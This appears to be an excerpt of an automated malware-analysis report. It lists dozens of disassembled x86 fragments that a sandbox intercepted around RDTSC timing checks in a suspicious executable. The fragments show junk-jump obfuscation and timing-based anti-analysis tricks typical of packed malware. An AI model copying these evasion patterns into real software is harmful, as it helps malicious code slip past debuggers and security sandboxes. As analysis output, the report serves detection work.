Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB05F5 second address: 4CB0642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d jmp 00007F97B4EC49BCh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F97B4EC49C0h 0x0000001a add ax, 2F68h 0x0000001f jmp 00007F97B4EC49BBh 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB0642 second address: 4CB06B3 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 and dword ptr [eax], 00000000h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F97B4F2EDD0h 0x00000012 add cl, FFFFFFC8h 0x00000015 jmp 00007F97B4F2EDCBh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F97B4F2EDD8h 0x00000021 sbb cx, 8428h 0x00000026 jmp 00007F97B4F2EDCBh 0x0000002b popfd 0x0000002c popad 0x0000002d and dword ptr [eax+04h], 00000000h 0x00000031 pushad 0x00000032 mov bl, ah 0x00000034 call 00007F97B4F2EDD1h 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C9063A second address: 4C90661 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F97B4EC49C5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90661 second address: 4C906A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F97B4F2EDCEh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F97B4F2EDD7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C906A0 second address: 4C906A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB00CA second address: 4CB00D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB00D0 second address: 4CB0106 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 jmp 00007F97B4EC49C6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F97B4EC49C0h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB0106 second address: 4CB010A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB010A second address: 4CB0126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB0126 second address: 4CB0130 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 241E1384h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB0130 second address: 4CB016F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F97B4EC49C9h 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 mov eax, 3EAC7813h 0x00000015 mov ax, 826Fh 0x00000019 popad 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F97B4EC49BCh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB016F second address: 4CB017E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0735 second address: 4CD073B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD073B second address: 4CD0798 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007F97B4F2EDCFh 0x0000000f movzx eax, bx 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F97B4F2EDD1h 0x0000001c jmp 00007F97B4F2EDCBh 0x00000021 popfd 0x00000022 push ecx 0x00000023 pushad 0x00000024 popad 0x00000025 pop edi 0x00000026 popad 0x00000027 xchg eax, ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F97B4F2EDD7h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0798 second address: 4CD0836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F97B4EC49BFh 0x00000009 add ax, 129Eh 0x0000000e jmp 00007F97B4EC49C9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F97B4EC49C0h 0x0000001a and ch, FFFFFF98h 0x0000001d jmp 00007F97B4EC49BBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 pushad 0x00000028 push edx 0x00000029 jmp 00007F97B4EC49C2h 0x0000002e pop ecx 0x0000002f pushfd 0x00000030 jmp 00007F97B4EC49BBh 0x00000035 add si, 0A0Eh 0x0000003a jmp 00007F97B4EC49C9h 0x0000003f popfd 0x00000040 popad 0x00000041 xchg eax, ecx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0836 second address: 4CD083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD083A second address: 4CD0840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0840 second address: 4CD0846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0846 second address: 4CD0891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [76FB65FCh] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F97B4EC49C6h 0x00000014 jmp 00007F97B4EC49C5h 0x00000019 popfd 0x0000001a mov ch, DEh 0x0000001c popad 0x0000001d test eax, eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ebx, ecx 0x00000024 mov ecx, 11692BC7h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0891 second address: 4CD0897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0897 second address: 4CD08E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F9827127A70h 0x00000011 jmp 00007F97B4EC49C6h 0x00000016 mov ecx, eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F97B4EC49C7h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD08E3 second address: 4CD08F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov edi, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD08F7 second address: 4CD090B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD09C1 second address: 4CD09C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD09C6 second address: 4CD09EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F97B4EC49BDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD09EF second address: 4CD0A1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F97B4F2EDD1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0A1D second address: 4CD0A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0A21 second address: 4CD0A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0A25 second address: 4CD0A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0A2B second address: 4CD0A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C80022 second address: 4C800A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F97B4EC49C1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F97B4EC49BEh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 mov cl, 73h 0x0000001a pushfd 0x0000001b jmp 00007F97B4EC49C3h 0x00000020 add cx, 898Eh 0x00000025 jmp 00007F97B4EC49C9h 0x0000002a popfd 0x0000002b popad 0x0000002c and esp, FFFFFFF8h 0x0000002f jmp 00007F97B4EC49BEh 0x00000034 xchg eax, ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C800A9 second address: 4C800AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C800AD second address: 4C800CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C800CA second address: 4C800E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F97B4F2EDCBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C800E0 second address: 4C800E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C800E6 second address: 4C80152 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F97B4F2EDD4h 0x00000013 or esi, 0DE71328h 0x00000019 jmp 00007F97B4F2EDCBh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F97B4F2EDD8h 0x00000025 sub esi, 1C4B4588h 0x0000002b jmp 00007F97B4F2EDCBh 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C80152 second address: 4C801A3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F97B4EC49C0h 0x00000008 sub ecx, 5DF827E8h 0x0000000e jmp 00007F97B4EC49BBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov dx, ax 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F97B4EC49C5h 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F97B4EC49BDh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C801A3 second address: 4C8020A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F97B4F2EDD7h 0x00000008 push eax 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebx, dword ptr [ebp+10h] 0x00000010 jmp 00007F97B4F2EDD2h 0x00000015 xchg eax, esi 0x00000016 jmp 00007F97B4F2EDD0h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov si, 5E13h 0x00000023 call 00007F97B4F2EDD8h 0x00000028 pop ecx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C8020A second address: 4C802B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F97B4EC49C0h 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F97B4EC49BEh 0x00000019 and ch, 00000028h 0x0000001c jmp 00007F97B4EC49BBh 0x00000021 popfd 0x00000022 mov edx, esi 0x00000024 popad 0x00000025 xchg eax, edi 0x00000026 jmp 00007F97B4EC49C2h 0x0000002b push eax 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F97B4EC49C1h 0x00000033 and ch, FFFFFFF6h 0x00000036 jmp 00007F97B4EC49C1h 0x0000003b popfd 0x0000003c push eax 0x0000003d push edx 0x0000003e pushfd 0x0000003f jmp 00007F97B4EC49BEh 0x00000044 xor ch, 00000018h 0x00000047 jmp 00007F97B4EC49BBh 0x0000004c popfd 0x0000004d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C802B0 second address: 4C80341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, edi 0x0000000b pushad 0x0000000c mov edx, esi 0x0000000e mov bx, ax 0x00000011 popad 0x00000012 test esi, esi 0x00000014 jmp 00007F97B4F2EDD4h 0x00000019 je 00007F98271DD0F0h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F97B4F2EDCDh 0x00000028 sbb cx, FBC6h 0x0000002d jmp 00007F97B4F2EDD1h 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007F97B4F2EDD0h 0x00000039 jmp 00007F97B4F2EDD5h 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C80341 second address: 4C8036C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F97B4EC49BDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C8036C second address: 4C803B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 pushfd 0x00000007 jmp 00007F97B4F2EDD3h 0x0000000c add esi, 5C363DBEh 0x00000012 jmp 00007F97B4F2EDD9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b je 00007F98271DD048h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C803B5 second address: 4C803B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C803B9 second address: 4C803BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C803BD second address: 4C803C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C803C3 second address: 4C803C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C803C9 second address: 4C803CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C803CD second address: 4C803D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C803D1 second address: 4C8043D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c mov eax, 5A97AC85h 0x00000011 movzx ecx, dx 0x00000014 popad 0x00000015 or edx, dword ptr [ebp+0Ch] 0x00000018 jmp 00007F97B4EC49BDh 0x0000001d test edx, 61000000h 0x00000023 jmp 00007F97B4EC49BEh 0x00000028 jne 00007F9827172C34h 0x0000002e jmp 00007F97B4EC49C0h 0x00000033 test byte ptr [esi+48h], 00000001h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F97B4EC49C7h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C8043D second address: 4C80443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C80443 second address: 4C8045D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F9827172C0Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F97B4EC49BAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C7088C second address: 4C70892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70892 second address: 4C708F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F97B4EC49BDh 0x00000013 xor ax, 4AE6h 0x00000018 jmp 00007F97B4EC49C1h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F97B4EC49C0h 0x00000024 and si, A688h 0x00000029 jmp 00007F97B4EC49BBh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C708F0 second address: 4C70908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4F2EDD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70908 second address: 4C7090C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C7090C second address: 4C70944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F97B4F2EDCEh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F97B4F2EDD0h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F97B4F2EDCAh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70944 second address: 4C70948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70948 second address: 4C7094E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C7094E second address: 4C70971 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F97B4EC49BAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70971 second address: 4C70980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70980 second address: 4C709BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F97B4EC49C8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C709BA second address: 4C709C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C709C0 second address: 4C70A46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 mov di, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e mov edi, 58469C86h 0x00000013 jmp 00007F97B4EC49C7h 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a jmp 00007F97B4EC49C6h 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 pushad 0x00000022 jmp 00007F97B4EC49BCh 0x00000027 mov eax, 6546DF21h 0x0000002c popad 0x0000002d mov edi, eax 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007F97B4EC49C3h 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F97B4EC49C5h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70A46 second address: 4C70AA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F97B4F2EDCCh 0x00000013 adc si, F978h 0x00000018 jmp 00007F97B4F2EDCBh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007F97B4F2EDD6h 0x00000026 add esi, 60AD93D8h 0x0000002c jmp 00007F97B4F2EDCBh 0x00000031 popfd 0x00000032 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70AA8 second address: 4C70AB7 instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 sub ebx, ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov dl, 67h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70AB7 second address: 4C70ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70ABB second address: 4C70AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, esi 0x00000008 popad 0x00000009 test esi, esi 0x0000000b jmp 00007F97B4EC49C0h 0x00000010 je 00007F982717A26Eh 0x00000016 pushad 0x00000017 mov ecx, ebx 0x00000019 popad 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push ecx 0x00000025 pop ebx 0x00000026 mov ebx, ecx 0x00000028 popad 0x00000029 rdtsc
